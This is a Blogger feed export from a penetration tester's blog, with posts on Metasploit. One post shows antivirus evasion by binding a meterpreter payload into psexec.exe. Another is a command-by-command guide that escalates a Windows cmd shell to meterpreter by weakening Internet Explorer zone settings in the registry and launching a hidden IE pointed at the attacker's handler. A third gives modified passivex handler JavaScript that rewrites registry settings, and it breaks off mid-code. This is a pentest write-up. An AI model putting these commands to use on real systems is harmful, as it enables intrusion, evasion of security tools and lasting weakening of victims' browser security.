tag:blogger.com,1999:blog-85422358398691527872024-03-08T13:21:09.612-08:00Invisible DenizenNathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.comBlogger19125tag:blogger.com,1999:blog-8542235839869152787.post-48289693189586172312010-03-31T15:29:00.000-07:002010-03-31T15:52:17.068-07:00java_signed_applet AV Detection<div>(Sorry for the wonky spacing below. I seem to have forgotten how to best display code in Blogger.)</div><div><br /></div>Any module in metasploit that generates and drops an executable uses the <a href="http://www.metasploit.com/redmine/projects/framework/repository/entry/lib/msf/util/exe.rb">Msf::Util::EXE.to_win32pe</a> function. This is the same function used by ./msfpayload to generate Windows executables, and takes a number of options which are usually not exposed via the exploit module and therefore can't easily be modified during an exploit run using ./msfconsole.<div><br /></div><div>As of <a href="http://www.metasploit.com/redmine/projects/framework/repository/revisions/8966">r8966</a>, <a href="http://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/multi/browser/java_signed_applet.rb">multi/browser/java_signed_applet</a> now exposes these options to help evade antivirus detection.</div><div><br /></div><div>When using a default exploit run, this is what you will see:</div><br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>nathan@polaris:/pentest/exploits/msf3-commit$ ./msfconsole<br /><br /> _ _<br /> _ | | (_)_<br />____ ____| |_ ____ ___ ____ | | ___ _| |_<br />| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)<br />| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__<br />|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)<br /> |_|<br /><br /><br />=[ metasploit v3.3.4-dev [core:3.3 api:1.0]<br />+ -- --=[ 538 exploits - 256 auxiliary<br />+ -- --=[ 198 payloads - 23 encoders - 8 nops<br />=[ svn r8964 updated today (2010.03.31)<br /><br />msf exploit(java_signed_applet) > set URIPATH /<br />URIPATH => /<br />msf exploit(java_signed_applet) > set payload windows/meterpreter/reverse_tcp<br />payload => windows/meterpreter/reverse_tcp<br />msf exploit(java_signed_applet) > set LHOST 10.10.10.43<br />LHOST => 10.10.10.43<br />msf exploit(java_signed_applet) > exploit<br />[*] Exploit running as background job.<br />msf exploit(java_signed_applet) ><br />[*] Started reverse handler on 10.10.10.43:4444<br />[*] Using URL: http://0.0.0.0:8080/<br />[*] Local IP: http://10.10.10.43:8080/<br />[*] Server started.<br /><br />msf exploit(java_signed_applet) ><br />[*] Handling request from 10.10.10.102:5822...<br />[*] Generated executable to drop (37888 bytes).<br />[*] Compiling applet classes...<br />[*] Compile completed. Building jar file...<br />[*] Jar built. Signing...<br />[*] Jar signed. Ready to send.<br /><br /></code></pre>At this point, McAfee or what have you just popped up on the target laptop, blocking the default generated exe.<div></div><div><br /></div><div>For a quick background, executable generation in metasploit uses a template.exe file by default that is kept in the msf/data/templates/ directory. This is a dummy exe that is merely used for a framework around the payload we actually want to execute. As of the last exec overhaul, this exe can now be virtually any Windows executable that has enough space inside it to allow the msf payload to be sliced in.</div><div><br /></div><div>Additionally, as of <a href="http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896">r8896</a>, executables can now act as a binder, where the payload is spawned as a new thread of the executable and will run in the background while the original executable executes. This is the new :insert option added to Msf::Util::EXE.to_win32pe.</div><div><br /></div><div>Now, by modifying the default :template option (via the 'Template' Advanced Option), we can evade almost all AV.</div><br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>nathan@polaris:/tmp$ wget http://download.sysinternals.com/Files/PsTools.zip<br />--2010-03-31 17:21:26-- http://download.sysinternals.com/Files/PsTools.zip<br />Resolving download.sysinternals.com... 207.46.140.23<br />Connecting to download.sysinternals.com|207.46.140.23|:80... connected.<br />HTTP request sent, awaiting response... 200 OK<br />Length: 1380351 (1.3M) [application/x-zip-compressed]<br />Saving to: `PsTools.zip'<br /><br />100%[===================================================================================================================>] 1,380,351 408K/s in 3.3s <br /><br />2010-03-31 17:21:29 (408 KB/s) - `PsTools.zip' saved [1380351/1380351]<br /><br />nathan@polaris:/tmp$ mkdir pstools && mv PsTools.zip pstools && cd pstools && unzip PsTools.zip<br />Archive: PsTools.zip<br />inflating: psexec.exe <br />inflating: psfile.exe <br />inflating: psgetsid.exe <br />inflating: Psinfo.exe <br />inflating: pskill.exe <br />inflating: pslist.exe <br />inflating: psloggedon.exe <br />inflating: psloglist.exe <br />inflating: pspasswd.exe <br />inflating: psservice.exe <br />inflating: psshutdown.exe <br />inflating: pssuspend.exe <br />inflating: Pstools.chm <br />extracting: psversion.txt <br />inflating: pdh.dll <br />inflating: Eula.txt <br />nathan@polaris:/tmp/pstools$ cd $MSF<br />nathan@polaris:/pentest/exploits/msf3-commit$ ./msfconsole<br /><br /> _ _ _ _<br /> | | | | (_) |<br />_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_<br />| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|<br />| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_<br />|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|<br /> | |<br /> |_|<br /><br /><br /> =[ metasploit v3.3.4-dev [core:3.3 api:1.0]<br />+ -- --=[ 538 exploits - 256 auxiliary<br />+ -- --=[ 198 payloads - 23 encoders - 8 nops<br /> =[ svn r8964 updated today (2010.03.31)<br /><br />msf exploit(java_signed_applet) > set payload windows/meterpreter/reverse_tcp<br />payload => windows/meterpreter/reverse_tcp<br />msf exploit(java_signed_applet) > set LHOST 10.10.10.43<br />LHOST => 10.10.10.43<br />msf exploit(java_signed_applet) > show options<br /><br />Module options:<br /><br />Name Current Setting Required Description<br />---- --------------- -------- -----------<br />AppletName SiteLoader yes The main applet's class name.<br />CertCN Metasploit Inc. yes The CN= value for the certificate.<br />PayloadName SiteSupport yes The payload classes name.<br />SRVHOST 0.0.0.0 yes The local host to listen on.<br />SRVPORT 8080 yes The local port to listen on.<br />SSL false no Negotiate SSL for incoming connections<br />SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)<br />URIPATH no The URI to use for this exploit (default is random)<br /><br /><br />Payload options (windows/meterpreter/reverse_tcp):<br /><br />Name Current Setting Required Description<br />---- --------------- -------- -----------<br />EXITFUNC process yes Exit technique: seh, thread, process<br />LHOST 10.10.10.43 yes The local address<br />LPORT 4444 yes The local port<br /><br /><br />Exploit target:<br /><br />Id Name<br />-- ----<br />1 Windows x86 (Native Payload)<br /><br /><br />msf exploit(java_signed_applet) > set URIPATH /<br />URIPATH => /<br />msf exploit(java_signed_applet) > show advanced<br /><br />Module advanced options:<br /><br />Name : AddClassPath<br />Current Setting:<br />Description : Additional java classpath<br /><br />Name : ContextInformationFile<br />Current Setting:<br />Description : The information file that contains context information<br /><br />Name : DisablePayloadHandler<br />Current Setting: false<br />Description : Disable the handler code for the selected payload<br /><br />Name : EnableContextEncoding<br />Current Setting: false<br />Description : Use transient context when encoding payloads<br /><br />Name : InsertPayload<br />Current Setting:<br />Description : Inject payload into template without affecting executable<br /> behavior<br /><br />Name : JavaCache<br />Current Setting: /home/nathan/.msf3/javacache<br />Description : Java cache location<br /><br />Name : SaveToFile<br />Current Setting:<br />Description : When set, source is saved to this directory under<br /> external/source/<br /><br />Name : Template<br />Current Setting: /pentest/exploits/msf3-commit/data/templates/template.exe<br />Description : The default executable template to use<br /><br />Name : WORKSPACE<br />Current Setting:<br />Description : Specify the workspace for this module<br /><br /><br /><br />Payload advanced options (windows/meterpreter/reverse_tcp):<br /><br />Name : AutoLoadStdapi<br />Current Setting: true<br />Description : Automatically load the Stdapi extension<br /><br />Name : AutoRunScript<br />Current Setting:<br />Description : A script to automatically on session creation.<br /><br />Name : AutoSystemInfo<br />Current Setting: true<br />Description : Automatically capture system information on initialization.<br /><br />Name : InitialAutoRunScript<br />Current Setting:<br />Description : An initial script to run on session created (before<br /> AutoRunScript)<br /><br />Name : ReverseConnectRetries<br />Current Setting: 5<br />Description : The number of connection attempts to try before exiting the<br /> process<br /><br />Name : WORKSPACE<br />Current Setting:<br />Description : Specify the workspace for this module<br /><br /><br />msf exploit(java_signed_applet) > set Template /tmp/pstools/psexec.exe<br />Template => /tmp/pstools/psexec.exe<br />msf exploit(java_signed_applet) > exploit<br />[*] Exploit running as background job.<br />msf exploit(java_signed_applet) ><br />[*] Started reverse handler on 10.10.10.43:4444<br />[*] Using URL: http://0.0.0.0:8080/<br />[*] Local IP: http://10.10.10.43:8080/<br />[*] Server started.<br /><br />msf exploit(java_signed_applet) ><br />[*] Handling request from 10.10.10.102:5805...<br />[*] Generated executable to drop (381304 bytes).<br />[*] Compiling applet classes...<br />[*] Compile completed. Building jar file...<br />[*] Jar built. Signing...<br />[*] Jar signed. Ready to send.<br />[*] Sending SiteLoader.jar to 10.10.10.102:5806. Waiting for user to click 'accept'...<br />[*] Sending SiteLoader.jar to 10.10.10.102:5806. Waiting for user to click 'accept'...<br />[*] Sending stage (748032 bytes) to 10.10.10.102<br />[*] Meterpreter session 1 opened (10.10.10.43:4444 -> 10.10.10.102:5807)<br /><br />msf exploit(java_signed_applet) > sessions -i 1<br />[*] Starting interaction with 1...<br /><br />meterpreter > getpid<br />Current pid: 4284<br />meterpreter > exit<br /><br />[*] Meterpreter session 1 closed. Reason: User exit<br />msf exploit(java_signed_applet) > exit<br /><br />[*] Server stopped.<br /></code></pre><div></div>Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com2tag:blogger.com,1999:blog-8542235839869152787.post-25018980416911389352009-05-21T12:17:00.000-07:002009-05-21T12:20:38.402-07:002009 Information Warfare SummitI gave a presentation at OKC ISSA's 2009 Information Warfare Summit, yesterday, covering:<br /><br />- common info sec weaknesses,<br />- new data from Verizon's 2009 Data Breach Incident Report,<br />- my reactions to the data / expectations / etc<br />- high level recommendations<br /><br />If interested, it is located <a href="http://sites.google.com/a/invisibledenizen.org/upload/asdf/20090520IWS-CommonInfoSecWeaknesses-FlatEarth.pdf?attredirects=0">here</a>.Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com1tag:blogger.com,1999:blog-8542235839869152787.post-60535683976047677052009-03-20T17:14:00.001-07:002009-03-21T19:58:28.969-07:00DC405 PresentationOn Friday I gave a talk to OKC's <a href="http://dc405.org">DC405</a> group on Metasploit and reverse tunneling out of strict network environments using PassiveX payloads. Unfortunately, we ended up without an available projector, so I gave the presentation by having everyone load it up on their laptops, using this blog and twitter to kick out links. :)<br /><br />All in all, it was a great group and spawned an impressive discussion afterwards. Thanks #dc405 for letting me come be a part of the group!<br /><br />Title:<br />"Advances in HTTP encapsulated payloads<br />Or, a Young Metasploit User's Illustrated Primer"<br /><br />DC405<br />03/20/2009<br /><br />Link: <a href="http://sites.google.com/a/invisibledenizen.org/upload/asdf/20090320HTTPPayloads1520.pdf">DC405 - HTTP Encapsulated Payloads</a>Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com3tag:blogger.com,1999:blog-8542235839869152787.post-80073738647337418232009-03-05T14:10:00.000-08:002009-03-05T14:21:56.680-08:00Common Info Security WeaknessesToday I gave a presentation to the <a href="http://www.isacacentralok.org">Oklahoma City</a> <a href="http://isaca.org">ISACA</a> chapter titled "Common Enterprise Security Weaknesses", which was a semi-random collection of observations from penetration tests in the OK, TX, and KS markets. Just in case anyone's interested, here's a link:<br /><br /><a href="http://sites.google.com/a/invisibledenizen.org/upload/asdf/CommonInfoSecurityWeaknesses.pdf">Common Information Security Weaknesses (pdf)</a>Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com0tag:blogger.com,1999:blog-8542235839869152787.post-19390730892695184502009-02-17T11:17:00.000-08:002009-02-17T14:22:21.602-08:00How to get meterpreter from shell in Windows(Update: just realized my formatting's off a tad and chopping off the end of some of those commands. If you copy/paste you'll be able to see the very end of the cmd.)<br /><br />Inspired by darkoperator's <a href="http://darkoperator.blogspot.com/2009/02/how-to-get-terminal-from-shell-in.html">How to get Terminal from Shell in Windows</a> post, here's a quick howto on a way to go from cmd shell to meterpreter shell (or any other msf payload).<br /><br />I've run into situations on pentests where I can run individual commands on a machine but want to elevate to a full, interactive shell with all the bells and whistles a meterpreter shell gives you. Scenarios where I've used similar techniques:<br /><ul><li>SQL injection in an application allows you to run commands (Oracle, MS SQL Server)<br /></li><li>Obtained (cracked, sniffed, whatever) a dba/sa level account in Oracle/MS SQL Server<br /></li><li>Registry access only (e.g. this <a href="http://trac.metasploit.com/browser/framework3/trunk/modules/auxiliary/admin/backupexec/registry.rb">Veritas Backup vuln</a> from 2005)</li><li>Some sort of PHP vuln on a WAMP server that grants you a piped command shell only</li></ul>There are two main ways to load additional code onto the machine: modify IE permissions and use a passivex payload or download a file from the internet and execute it. For this round, I'll just show how to use a passivex payload, but if you want to download a file you can either use ftp commands or xmlhttp inside vbscript. (Google will have many results on these; maybe I'll write up a howto later.)<br /><br />To start, we'll need an msf handler running somewhere accessible from the client to accept our connection request once the payload has been executed:<br /><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>root@bt:/pentest/exploits/framework3# ./msfconsole<br /><br /> 888 888 d8b888<br /> 888 888 Y8P888<br /> 888 888 888<br />88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888<br />888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888<br />888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888<br />888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.<br />888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888<br /> 888<br /> 888<br /> 888<br /><br /><br /> =[ msf v3.3-dev<br />+ -- --=[ 345 exploits - 223 payloads<br />+ -- --=[ 20 encoders - 7 nops<br /> =[ 123 aux<br /><br />msf > use multi/handler<br />msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_http<br />PAYLOAD => windows/meterpreter/reverse_http<br />msf exploit(handler) > ifconfig<br />[*] exec: ifconfig<br /><br />eth1 Link encap:Ethernet HWaddr 00:0c:29:b0:10:8e<br /> inet addr:192.168.206.129 Bcast:192.168.206.255 Mask:255.255.255.0<br /> inet6 addr: fe80::20c:29ff:feb0:108e/64 Scope:Link<br /> UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br /> RX packets:1218 errors:0 dropped:0 overruns:0 frame:0<br /> TX packets:1023 errors:0 dropped:0 overruns:0 carrier:0<br /> collisions:0 txqueuelen:1000<br /> RX bytes:389976 (389.9 KB) TX bytes:121421 (121.4 KB)<br /> Interrupt:18 Base address:0x2080<br /><br />lo Link encap:Local Loopback<br /> inet addr:127.0.0.1 Mask:255.0.0.0<br /> inet6 addr: ::1/128 Scope:Host<br /> UP LOOPBACK RUNNING MTU:16436 Metric:1<br /> RX packets:0 errors:0 dropped:0 overruns:0 frame:0<br /> TX packets:0 errors:0 dropped:0 overruns:0 carrier:0<br /> collisions:0 txqueuelen:0<br /> RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)<br /><br />msf exploit(handler) > set PXHOST 192.168.206.129<br />PXHOST => 192.168.206.129<br />msf exploit(handler) > show options<br /><br />Module options:<br /><br />Name Current Setting Required Description<br />---- --------------- -------- -----------<br /><br /><br />Payload options (windows/meterpreter/reverse_http):<br /><br />Name Current Setting Required Description<br />---- --------------- -------- -----------<br />EXITFUNC seh yes Exit technique: seh, thread, process<br />PXAXCLSID B3AC7307-FEAE-4e43-B2D6-161E68ABA838 yes ActiveX CLSID<br />PXAXDLL /pentest/exploits/framework3/data/passivex/passivex.dll yes ActiveX DLL to inject<br />PXAXVER -1,-1,-1,-1 yes ActiveX DLL Version<br />PXHOST 192.168.206.129 yes The local HTTP listener hostname<br />PXPORT 8080 yes The local HTTP listener port<br />PXURI /RFT74xFlyWB2IYexlRLSq9txAgowPyi4 no The URI root for requests<br /><br /><br />Exploit target:<br /><br />Id Name<br />-- ----<br />0 Wildcard Target<br /><br /><br />msf exploit(handler) > exploit<br /><br />[*] PassiveX listener started.<br />[*] Starting the payload handler...<br /></code></pre><br />Next, the commands to kick through to your command shell. First we'll be modifying the registry to add a new IP address into the Intranet zone:<br /><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>C:\>reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\randomname" /v ":Range" /d "192.168.206.129"<br /><br />The operation completed successfully<br /><br />C:\>reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\randomname" /v "*" /t REG_DWORD /d 1<br /><br />The operation completed successfully<br /><br />C:\><br /></code></pre><br />Next we'll be adding the necessary permissions to the Intranet zone. (For a discussion on what settings are needed, refer to <a href="http://blog.invisibledenizen.org/2009/02/updating-passivex-handler-to-work-with.html">this post</a>.)<br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>C:\>reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1001" /t REG_DWORD /d 0<br /><br />The operation completed successfully<br /><br />C:\>reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1004" /t REG_DWORD /d 0<br /><br />The operation completed successfully<br /><br />C:\>reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1200" /t REG_DWORD /d 0<br /><br />The operation completed successfully<br /><br />C:\>reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1201" /t REG_DWORD /d 0<br /><br />The operation completed successfully<br /><br />C:\>reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1208" /t REG_DWORD /d 0<br /><br />The operation completed successfully<br /><br />C:\><br /></code></pre><br />From here, I usually write a vbscript to disk that will launch an invisible instance of Internet Explorer pointed to your msf server. If for some reason you didn't care about IE being visible, you could always just execute it directly from your command shell, but assuming you don't want a big IE windy to pop up on the server, here's what you run:<br /><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>C:\>echo CreateObject("Wscript.Shell").Run "iexplore.exe -new http://192.168.206.129:8080/RFT74xFlyWB2IYexlRLSq9txAgowPyi4", 0, False > temp.vbs<br /><br />C:\>wscript temp.vbs<br /><br />C:\>del temp.vbs<br /><br />C:\><br /></code></pre><br />At this point, an invisible instance of IE is running and just loaded code from your msf server. Because you modified the registry settings to allow passivex to load, you now have a meterpreter shell running in your msf console:<br /><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>[*] Sending PassiveX main page to client<br />[*] Sleeping before handling stage...<br />[*] Sending stage to sid 1 (2650 bytes)<br />[*] Uploading DLL (75787 bytes)...<br />[*] Upload completed.<br />[*] Meterpreter session 1 opened (Local Pipe -> Remote Pipe)<br /><br />meterpreter > getpid<br />Current pid: 3048<br />meterpreter ><br /></code></pre><br />To recap, here are all of the windows commands used in this post:<br /><br /><b>Mapping an IP address to Internet Explorer's Intranet security zone:</b><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\randomname" /v ":Range" /d "192.168.206.129"<br />reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\randomname" /v "*" /t REG_DWORD /d 1<br /></code></pre><br /><b>Configuring the Intranet zone to autoload passivex:</b><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1001" /t REG_DWORD /d 0<br />reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1004" /t REG_DWORD /d 0<br />reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1200" /t REG_DWORD /d 0<br />reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1201" /t REG_DWORD /d 0<br />reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1208" /t REG_DWORD /d 0<br /></code></pre><br /><b>Creating vbscript to invisibly launch internet explorer pointed to our msf server:</b><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>echo CreateObject("Wscript.Shell").Run "iexplore.exe -new http://192.168.206.129:8080/RFT74xFlyWB2IYexlRLSq9txAgowPyi4", 0, False > temp.vbs<br /></code></pre><br /><b>Running our vbscript and deleting temp.vbs:</b><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>wscript temp.vbs<br />del temp.vbs<br /></code></pre>Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com4tag:blogger.com,1999:blog-8542235839869152787.post-42570645853583368882009-02-03T21:34:00.000-08:002009-02-03T22:48:41.771-08:00Updating the passivex handler to work with IE7If you've ever played with metasploit before, you may have wondered what all of the windows/*/reverse_http payloads were:<br /><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>msf exploit(handler) > search reverse_http<br />[*] Searching loaded modules for pattern 'reverse_http'...<br /><br />Compatible payloads<br />===================<br /><br /> Name Description<br /> ---- -----------<br /> generic/debug_trap/reverse_http Generic x86 Debug Trap, PassiveX Reverse HTTP Tunneling Stager<br /> windows/dllinject/reverse_http Windows Inject DLL, PassiveX Reverse HTTP Tunneling Stager<br /> windows/download_exec/reverse_http Windows Executable Download and Execute, PassiveX Reverse HTTP Tunneling Stager<br /> windows/exec/reverse_http Windows Execute Command, PassiveX Reverse HTTP Tunneling Stager<br /> windows/meterpreter/reverse_http Windows Meterpreter, PassiveX Reverse HTTP Tunneling Stager<br /> windows/reflectivedllinject/reverse_http Reflective Dll Injection, PassiveX Reverse HTTP Tunneling Stager<br /> windows/reflectivemeterpreter/reverse_http Windows Meterpreter, PassiveX Reverse HTTP Tunneling Stager<br /> windows/reflectivevncinject/reverse_http Reflective VNC Dll Injection, PassiveX Reverse HTTP Tunneling Stager<br /> windows/shell/reverse_http Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager<br /> windows/upexec/reverse_http Windows Upload/Execute, PassiveX Reverse HTTP Tunneling Stager<br /> windows/vncinject/reverse_http Windows VNC Inject, PassiveX Reverse HTTP Tunneling Stager<br /></code></pre><br />Background detail on how this stager works is available in skape's <a href="http://uninformed.org/index.cgi?v=" a="3">excellent uninformed journal article</a>.<br /><br /><b>A quick overview:</b><br /><br />Passivex is an ActiveX control that implements a tunnel running inside IE for your <a href="http://metasploit.com/">msf payloads</a>. As such, it gets things like network proxy configuration for free! Imagine an environment that blocked all outgoing ports -- but allowed users to browse the internet as long as they used the company's HTTP proxy. In these scenarios, a normal reverse_tcp payload will not work, because it will be blocked by the company's firewall. If you use a reverse_http payload, however, it'll float right through the HTTP proxy and connect back to your msf server! Assuming the user is already authenticated to the firewall/proxy, IE will helpfully log them in for you, too.<br /><br />Unfortunately, there are a few restrictions with the current passivex stager:<br /><ul><li>It only works with IE6 due to a new IE7 security setting</li><li>It permanently neuters the security settings for your IE's <a href="http://support.microsoft.com/kb/174360/">Internet zone</a>, giving every website IE6 users visit the option of running commands on the vulnerable machine</li><li>In IE7, not only does it not function, but the first website they visit after you've attempted a passivex payload is greeted with this huge, nasty warning:</li></ul><img src="http://sites.google.com/a/invisibledenizen.org/upload/asdf/ie_security_warning.PNG" /><br /><br />When you use one of these payloads, it:<br /><ol><li>Modifies registry entries located at HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ that correspond to the "Download signed ActiveX controls", "Download unsigned ActiveX controls", "Run ActiveX controls and plug-ins", and "Initialize and script ActiveX controls not marked as safe for scripting" security settings.</li><li>Launches an iexplore.exe marked to be invisible (you see a new process in task manager, only -- no window) pointed towards your msf server</li><li>Msf responds with some HTTP that instantiates the passivex ActiveX control</li><li>The passivex control begins communication, pulling down whatever payload you selected and piping it's output/input back to the msf server</li></ol>An ideal version of passivex would work in both IE6 and IE7, would limit it's impact on the compromised system, would clean up after itself whenever it's done, and would not increase the size of the initial stager.<br /><br />To keep the initial size small and because it was easiest, I implemented all of this in the javascript of the 3rd item, above. This is possible because the "Initialize and script ActiveX controls not marked as safe for scripting" setting grants access to modify the registry (assuming the user has rights) and run commands. The javascript<br /><ul><li>Drops your IP address into the <b>Intranet</b> security zone</li><li>Modifies the 4 settings above, plus the new setting "Allow previously unused ActiveX controls to run without prompt", for the Intranet zone</li><li>Launches a second copy of IE that will run under the new permissions</li><li>Restores the <b>Internet</b> security zone to it's default settings</li><li>Waits 60 seconds and then restores the <b>Intranet</b> security settings to the default<br /></li></ul>Below is the beta code that does just that. Replace ~line 317 lib/msf/core/handler/passivex.rb where it sets the resp.body variable with the below, restart metasploit, and you should be good to go.<br /><br />Still to do:<br /><ul><li>Randomize variables, remove white space inside needed variables, then randomize whitespace</li><li>Implement HTTPS for encryption (this shouldn't be hard; ruby/msf already support it)</li><li>Modify the ASM block in the initial stager to not modify all the extra security settings; it now only needs to modify 1201, "Initialize and script ActiveX controls not marked as safe for scripting"<br /></li></ul><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code> # fixed to work with IE7<br /> resp.body = %Q^<html> <br /><object classid="CLSID:#{datastore['PXAXCLSID']}" codebase="#{datastore['PXURI']}/passivex.dll##{datastore['PXAXVER']}"> <br /> <param name="HttpHost" value="#{datastore['PXHOST']}"> <br /> <param name="HttpPort" value="#{datastore['PXPORT']}"><br /> <param name="HttpUriBase" value="#{datastore['PXURI']}"> <br /> <param name="HttpSid" value="#{nsid}">^ + ((stage_payload) ? %Q^<br /> <param name="DownloadSecondStage" value="1">^ : "") + %Q^<br /></object><br /><script><br />var WshShell = new ActiveXObject("Wscript.Shell");<br />var marker = true;<br />var regCheck;<br />var regRange = "HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Ranges\\\\random\\\\" //Can be any value<br />var regIntranet = "HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\";<br /><br />//Check if we've run this before.<br />try { regCheck = WshShell.RegRead(regRange + "marker"); } catch (e) { marker = false; }<br /><br />if (marker == false) {<br /> //Modify perms for the Intranet zone.<br /> WshShell.RegWrite(regIntranet + "1001",0,"REG_DWORD");<br /> WshShell.RegWrite(regIntranet + "1004",0,"REG_DWORD");<br /> WshShell.RegWrite(regIntranet + "1200",0,"REG_DWORD");<br /> WshShell.RegWrite(regIntranet + "1201",0,"REG_DWORD");<br /> WshShell.RegWrite(regIntranet + "1208",0,"REG_DWORD");<br /><br /> //Map IP to the newly modified zone.<br /> WshShell.RegWrite(regRange,1,"REG_SZ");<br /> WshShell.RegWrite(regRange + ":Range","#{datastore['PXHOST']}","REG_SZ");<br /> WshShell.RegWrite(regRange + "*",1,"REG_DWORD");<br /> WshShell.RegWrite(regRange + "marker",1,"REG_DWORD"); //Just a marker<br /><br /> //Clean up after the original passivex stage1 loader; reset to default IE7 install<br /> var regDefault = 